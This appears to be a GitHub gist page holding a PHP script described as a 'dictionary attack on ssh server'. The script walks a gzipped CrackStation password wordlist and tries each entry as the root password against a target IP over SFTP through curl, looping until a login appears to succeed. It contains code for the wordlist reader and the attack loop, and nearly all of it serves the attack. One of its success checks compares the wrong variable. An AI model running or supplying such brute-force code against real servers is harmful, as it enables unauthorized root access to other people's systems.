Created
June 14, 2019 15:50
-
-
Save divinity76/c382bf251cbbc3eaad18121cc56455ed to your computer and use it in GitHub Desktop.
dictionary attack on ssh server..
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
declare (strict_types = 1); | |
const CRACKSTATION_FILENAME = "crackstation.txt.gz"; | |
const TARGET_IP=''; | |
init(); | |
// if ($argc !== 2) { | |
// die("{$argv[0]} X (method)\n"); | |
// } | |
// $method = $argv[1]; | |
// if ($method === "1") { | |
// echo "using custom-optimized gzread() loop...\n"; | |
// for ($i = 0; $i < 10000000; ++$i) { | |
// $v=0.0; | |
// var_dump(get_next_password_custom_optimized($v),$v); | |
// } | |
// } elseif ($method === "2") { | |
// echo "using gzgets() loop...\n"; | |
// for ($i = 0; $i < 10000000; ++$i) { | |
// var_dump(get_next_password_simple()); | |
// } | |
// } else { | |
// die("ERROR: UNKNOWN METHOD!\n"); | |
// } | |
$ch = curl_init(); | |
curl_setopt_array($ch, array( | |
//CURLOPT_VERBOSE=>1, | |
CURLOPT_URL => 'sftp://'.TARGET_IP.':/dev/null', | |
CURLOPT_USERPWD => 'root:ddd', | |
CURLOPT_SSH_AUTH_TYPES => CURLSSH_AUTH_PASSWORD, | |
CURLOPT_SSL_VERIFYHOST => 0, | |
CURLOPT_SSL_VERIFYPEER => 0, | |
CURLOPT_SSL_VERIFYSTATUS => 0, | |
CURLOPT_CONNECTTIMEOUT=>10, | |
CURLOPT_TIMEOUT=>15, | |
)); | |
$attempts = 0; | |
$percent = -1; | |
$exceptional = false; | |
for (;;) { | |
++$attempts; | |
$pass = get_next_password_simple($percent); | |
echo "attempts: {$attempts} percent: ".number_format($percent,10)." - trying \"{$pass}\".."; | |
curl_setopt($ch,CURLOPT_USERPWD, 'root:'.$pass); | |
$cret = curl_exec($ch); | |
echo "."; | |
if ($cret !== false) { | |
echo "\n"; | |
echo "EXCEPTIONAL - CURL_EXEC DID NOT RETURN BOOL(FALSE) !!\n"; | |
hhb_var_dump($cret); | |
$exceptional = true; | |
} | |
$errno = curl_errno($ch); | |
if ($cret !== 67) { | |
echo "\n"; | |
echo "EXCEPTIONAL - CURL_ERRNO WAS NOT 67!!\n"; | |
hhb_var_dump($errno); | |
$exceptional = true; | |
} | |
if ($exceptional) { | |
hhb_var_dump($pass, curl_exec($ch), curl_errno($ch), curl_error($ch), curl_strerror(curl_errno($ch))); | |
die("SUCCESS? EXITING\n"); | |
} | |
echo "nope.\n"; | |
} | |
echo ":( FAILED\n"; | |
function init() | |
{ | |
if (!version_compare(PHP_VERSION, '7.1.0', '>=')) { | |
die("error: script requires PHP >= 7.1.0"); | |
} | |
require_once('hhb_.inc.php'); | |
hhb_init(); | |
} | |
function get_next_password_simple(float &$percent = null): string | |
{ | |
static $inited = false; | |
static $eof = false; | |
static $fp = null; | |
static $total = -1; | |
if (!$inited) { | |
$fp = gzopen(CRACKSTATION_FILENAME, "rb"); | |
if (!$fp) { | |
throw new \RuntimeException("failed to open CRACKSTATION file \"" . CRACKSTATION_FILENAME . "\"! cwd: \"" . getcwd() . "\""); | |
} | |
$total = filesize(CRACKSTATION_FILENAME); | |
$inited = true; | |
} | |
if ($eof) { | |
if ($fp) { | |
gzclose($fp); | |
$fp = null; | |
} | |
die("LAST PASSWORD TRIED!"); | |
} | |
$ret = gzgets($fp); | |
if (empty($ret)) { | |
//... | |
$eof = true; | |
} | |
$ret = rtrim($ret, "\r\n"); | |
if (empty($ret)) { | |
$ret = get_next_password_simple($percent); | |
} else { | |
if ($percent !== null) { | |
$percent = (gztell($fp) / $total) * 100; | |
} | |
} | |
return $ret; | |
} | |
function get_next_password_custom_optimized(float &$percent = null): ?string | |
{ | |
static $inited = false; | |
static $fp = null; | |
static $buffer = array(); | |
static $eof = false; | |
static $total = -1; | |
if (!$inited) { | |
$fp = gzopen(CRACKSTATION_FILENAME, "rb"); | |
if (!$fp) { | |
throw new \RuntimeException("failed to open CRACKSTATION file \"" . CRACKSTATION_FILENAME . "\"! cwd: \"" . getcwd() . "\""); | |
} | |
$total = filesize(CRACKSTATION_FILENAME); | |
$inited = true; | |
} | |
if ($eof && empty($buffer)) { | |
if ($fp) { | |
gzclose($fp); | |
$fp = null; | |
} | |
return null; | |
} | |
if (empty($buffer)) { | |
$to_read = 10 * 1024 * 1024; | |
$read = ""; | |
while ($to_read > 0) { | |
$read_now = gzread($fp, $to_read); | |
if (!is_string($read_now)) { | |
throw new \RuntimeException("gzread error!"); | |
} | |
if (strlen($read_now) < 1) { | |
// EOF probably? | |
$eof = true; | |
break; | |
} | |
$to_read -= strlen($read_now); | |
$read .= $read_now; | |
} | |
if (!$eof) { | |
while (substr($read, -1) !== "\n") { | |
$read_now = gzgetc($fp); | |
if (false === $read_now || strlen($read_now) !== 1) { | |
$eof = true; | |
break; | |
} | |
$read .= $read_now; | |
} | |
} | |
$buffer = explode("\n", rtrim($read, "\n")); | |
} | |
$ret = array_pop($buffer); | |
$ret = rtrim($ret, "\r\n"); | |
return $ret; | |
} | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment